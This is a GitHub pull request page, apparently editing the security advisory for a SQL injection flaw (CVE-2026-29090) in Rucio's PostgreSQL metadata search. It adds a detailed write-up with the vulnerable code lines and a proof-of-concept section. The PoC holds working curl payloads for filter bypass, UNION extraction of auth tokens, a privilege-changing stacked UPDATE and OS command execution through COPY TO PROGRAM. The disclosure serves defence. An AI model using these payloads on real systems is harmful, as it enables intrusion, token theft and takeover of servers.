Skip to content

[GHSA-6j7p-qjhg-9947] Rucio has SQL Injection in FilterEngine PostgreSQL Query Builder via DID Search API #7773

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
bziemons wants to merge 1 commit into
base: bziemons/advisory-improvement-7773
Choose a base branch
from
+2 −6
Open

[GHSA-6j7p-qjhg-9947] Rucio has SQL Injection in FilterEngine PostgreSQL Query Builder via DID Search API #7773

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 2 additions & 6 deletions advisories/github-reviewed/2026/05/GHSA-6j7p-qjhg-9947/GHSA-6j7p-qjhg-9947.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,18 +1,14 @@
{
"schema_version": "1.4.0",
"id": "GHSA-6j7p-qjhg-9947",
"modified": "2026-05-08T18:22:59Z",
"modified": "2026-05-08T18:23:00Z",
"published": "2026-05-06T16:44:07Z",
"aliases": [
"CVE-2026-29090"
],
"summary": "Rucio has SQL Injection in FilterEngine PostgreSQL Query Builder via DID Search API",
"details": "### Summary\n\nA SQL injection vulnerability in `FilterEngine.create_postgres_query` allows any authenticated Rucio user to execute arbitrary SQL against the configured PostgreSQL metadata database through the DID search endpoint (`GET /dids/<scope>/dids/search`). When the external metadata plugin `postgres_meta` is configured, attacker-controlled filter keys and values are interpolated directly into raw SQL statements via Python `str.format`. This enables full database compromise including data exfiltration, data modification, and potential remote code execution via `COPY ... FROM PROGRAM`.\n\n### Details\n\n*Will follow in two weeks (2025-05-19).*\n\n### Impact\n\n**Vulnerability type:** SQL Injection (CWE-89)\n\n**Who is impacted:**\n\n- Rucio deployments that have explicitly configured the `postgres_meta` metadata plugin.\n\n**What an attacker can do:**\n\n- **Data modification:** PostgreSQL stacked queries enable arbitrary `INSERT`/`UPDATE`/`DELETE` operations.\n- **Remote code execution:** Via PostgreSQL's `COPY ... FROM PROGRAM` if the database user has superuser or `pg_execute_server_program` privileges.\n- **File system access:** Via `COPY ... TO/FROM '/path'` if filesystem permissions allow.\n\n**Further elevation when the same postgres database and access is used for metadata and for Rucio itself**\n\n- **Full database read access:** Extract any table including `identities` (password hashes and salts), `tokens` (active authentication sessions), `accounts` (user enumeration), `rse_settings` (storage endpoint credentials), and `rules` (data management policies) could be extracted.\n- **Password hash extraction:** Combined with Rucio's use of single-iteration SHA-256 for password hashing (no KDF), extracted hashes can be cracked at GPU speed.\n- **Authentication token theft:** Active bearer tokens can be extracted and used for immediate session hijacking.\n\n**Required attacker privileges:** Any authenticated Rucio user. Authentication tokens can be obtained via any supported method (userpass, x509, OIDC, SAML, SSH, GSS). No special roles or administrative permissions are required. The `GET /dids/<scope>/dids/search` endpoint is available to all authenticated users.",
"details": "### Summary\n\nA SQL injection vulnerability in `FilterEngine.create_postgres_query` allows any authenticated Rucio user to execute arbitrary SQL against the configured PostgreSQL metadata database through the DID search endpoint (`GET /dids/<scope>/dids/search`). When the external metadata plugin `postgres_meta` is configured, attacker-controlled filter keys and values are interpolated directly into raw SQL statements via Python `str.format`. This enables full database compromise including data exfiltration, data modification, and potential remote code execution via `COPY ... FROM PROGRAM`.\n\n---\n\n### Details\n\nThe vulnerability exists in `lib/rucio/core/did_meta_plugins/filter_engine.py` within the `create_postgres_query()` method (lines 408-484). This method builds raw SQL strings via Python `.format()` across 6 distinct injection points:\n\n**filter_engine.py:477** (string equality — default branch):\n```python\nexpression = \"{}->>'{}' {} '{}'\".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)\n```\n\n**filter_engine.py:442** (wildcard/LIKE branch):\n```python\nexpression = \"{}->>'{}' LIKE '{}' \".format(jsonb_column, key, value.replace('*', '%'))\n```\n\n**filter_engine.py:456** (boolean branch — value unquoted):\n```python\nexpression = \"({}->>'{}' )::boolean {} {}\".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)\n```\n\n**filter_engine.py:462** (numeric branch — value unquoted):\n```python\nexpression = \"({}->>'{}' )::float {} {}\".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)\n```\n\n**filter_engine.py:472** (datetime branch):\n```python\nexpression = \"({}->>'{}' )::timestamp {} '{}'\".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)\n```\n\n**filter_engine.py:479** (non-JSONB column fallback):\n```python\nexpression = \"{} {} '{}'\".format(key, POSTGRES_OP_MAP[oper], value)\n```\n\nBoth `key` and `value` are attacker-controlled strings derived from HTTP query parameters. The resulting `expression` string is concatenated into a larger query string (`postgres_query_str`) that is then passed to `psycopg3`'s `sql.SQL()`:\n\n```python\n# postgres_meta.py:314-316\nstatement = sql.SQL(\"SELECT * FROM {} WHERE {} {}\").format(\n sql.Identifier(self.table),\n sql.SQL(postgres_query_str), # <-- UNSANITIZED user-derived string\n sql.SQL(\"LIMIT {}\").format(sql.Literal(limit)) if limit else sql.SQL(\"\")\n)\n```\n\n`sql.SQL()` wraps the string as a trusted SQL syntax fragment — it does **not** escape or parameterize its contents. The statement is then executed via `cur.execute(statement)` at `postgres_meta.py:321`.\n\n#### Why no existing defense blocks this\n\nThe data flow from HTTP request to SQL execution passes through multiple layers with no effective sanitization:\n\n1. **HTTP input** (`dids.py:265-274`): Filter keys and values are accepted from query parameters via `ast.literal_eval()` or directly from individual query argument names/values. The fallback path only excludes 4 reserved keys (`type`, `limit`, `long`, `recursive`).\n\n2. **Plugin routing** (`did_meta_plugins/__init__.py:227-248`): Each filter key is checked via `manages_key()`. `postgres_meta.manages_key()` **unconditionally returns `True`** (line 345) — it accepts ANY filter key without validation.\n\n3. **FilterEngine initialization**: The `postgres_meta` plugin instantiates `FilterEngine` with `strict_coerce=False`. Unknown keys pass through `_coerce_filter_word_to_model_attribute()` as raw strings.\n\n4. **Value typecasting** (`filter_engine.py:275-297`): `_try_typecast_string()` attempts to parse the value as a boolean, datetime, or number. SQL injection strings fail all these parsers and are returned unchanged.\n\n5. **Sanity checks** (`filter_engine.py:149-190`): `_sanity_check_translated_filters()` does **not** validate arbitrary key names or values for SQL-unsafe characters.\n\n6. **SQL construction** (`filter_engine.py:442-479`): The unsanitized key and value strings are interpolated directly into raw SQL strings via `.format()`.\n\n7. **SQL execution** (`postgres_meta.py:316,321`): The raw string is wrapped in `sql.SQL()` (treated as trusted SQL) and executed via `cur.execute()`.\n\n---\n\n### PoC\n\n**Prerequisites:**\n- A Rucio instance using PostgreSQL as the database backend\n- The `postgres_meta` metadata plugin **explicitly configured** (this is NOT the default — the default is `json_meta`)\n- Any valid Rucio authentication token (obtainable via userpass, x509, OIDC, SAML, SSH, or GSS)\n\n#### 1. Obtain an authentication token\n\n```bash\nTOKEN=$(curl -s -k \\\n -H 'X-Rucio-Account: testuser' \\\n -H 'X-Rucio-Username: testuser' \\\n -H 'X-Rucio-Password: testpass' \\\n 'https://rucio.example.org/auth/userpass' \\\n -D - 2>/dev/null | grep -i 'x-rucio-auth-token' | awk '{print $2}' | tr -d '\\r')\n```\n\n#### 2. Value injection — boolean-based filter bypass\n\n```bash\n# postgres_meta uses create_postgres_query() -> raw string formatting\n# filter_engine.py:477: \"{}->>'{}' {} '{}'\".format(jsonb_column, key, op, value)\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x'%20OR%20'1'%3D'1\"\n\n# URL-decoded: custom_key=x' OR '1'='1\n#\n# Generated SQL fragment:\n# data->>'custom_key' = 'x' OR '1'='1'\n#\n# Effect: WHERE clause always true, returns all rows\n```\n\n#### 3. Key injection via query parameter name\n\n```bash\n# The key is single-quoted but unescaped — injection via closing quote.\n# filter_engine.py:477: \"{}->>'{}' {} '{}'\".format(jsonb_column, key, op, value)\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \"https://rucio.example.org/dids/user.testuser/dids/search?x'%20OR%201%3D1--%20=anything\"\n\n# URL-decoded: key = x' OR 1=1-- , value = anything\n#\n# Generated SQL fragment:\n# data->>'x' OR 1=1-- ' = 'anything'\n# ^^^^^^^^ injected, -- comments out the rest\n```\n\n#### 4. UNION-based data extraction\n\n```bash\n# Extract auth tokens from the tokens table.\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x'%20UNION%20SELECT%20token%2Caccount%2CNULL%2CNULL%20FROM%20tokens%20--\"\n\n# URL-decoded: custom_key=x' UNION SELECT token,account,NULL,NULL FROM tokens --\n#\n# Effect: Appends tokens table contents to the result set\n```\n\n#### 5. Stacked queries — data modification\n\n```bash\n# PostgreSQL supports multiple statements separated by ;\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x';%20UPDATE%20accounts%20SET%20account_type%3D'SERVICE'%20WHERE%20account%3D'testuser';%20--\"\n\n# URL-decoded: custom_key=x'; UPDATE accounts SET account_type='SERVICE' WHERE account='testuser'; --\n```\n\n#### 6. Remote code execution (if database user has superuser privileges)\n\n```bash\n# PostgreSQL COPY ... FROM PROGRAM executes OS commands\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x';%20COPY%20(SELECT%20'')%20TO%20PROGRAM%20'id%20>%20/tmp/pwned';%20--\"\n\n# URL-decoded: custom_key=x'; COPY (SELECT '') TO PROGRAM 'id > /tmp/pwned'; --\n# Requires: database user with pg_execute_server_program or superuser role\n```\n\n#### 7. Alternative entry via `filters` query parameter\n\n```bash\n# The filters parameter accepts Python literal syntax via ast.literal_eval().\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n 'https://rucio.example.org/dids/user.testuser/dids/search?filters=%5B%7B%22custom_key%22%3A%20%22x%27%20OR%20%271%27%3D%271%22%7D%5D'\n\n# URL-decoded: filters=[{\"custom_key\": \"x' OR '1'='1\"}]\n```\n\n---\n\n### Impact\n\n**Vulnerability type:** SQL Injection (CWE-89)\n\n**Who is impacted:**\n\n- Rucio deployments that have explicitly configured the `postgres_meta` metadata plugin.\n\n**What an attacker can do:**\n\n- **Data modification:** PostgreSQL stacked queries enable arbitrary `INSERT`/`UPDATE`/`DELETE` operations.\n- **Remote code execution:** Via PostgreSQL's `COPY ... FROM PROGRAM` if the database user has superuser or `pg_execute_server_program` privileges.\n- **File system access:** Via `COPY ... TO/FROM '/path'` if filesystem permissions allow.\n\n**Further elevation when the same postgres database and access is used for metadata and for Rucio itself**\n\n- **Full database read access:** Extract any table including `identities` (password hashes and salts), `tokens` (active authentication sessions), `accounts` (user enumeration), `rse_settings` (storage endpoint credentials), and `rules` (data management policies) could be extracted.\n- **Password hash extraction:** Combined with Rucio's use of single-iteration SHA-256 for password hashing (no KDF), extracted hashes can be cracked at GPU speed.\n- **Authentication token theft:** Active bearer tokens can be extracted and used for immediate session hijacking.\n\n**Required attacker privileges:** Any authenticated Rucio user. Authentication tokens can be obtained via any supported method (userpass, x509, OIDC, SAML, SSH, GSS). No special roles or administrative permissions are required. The `GET /dids/<scope>/dids/search` endpoint is available to all authenticated users.",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
},
{
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
Expand Down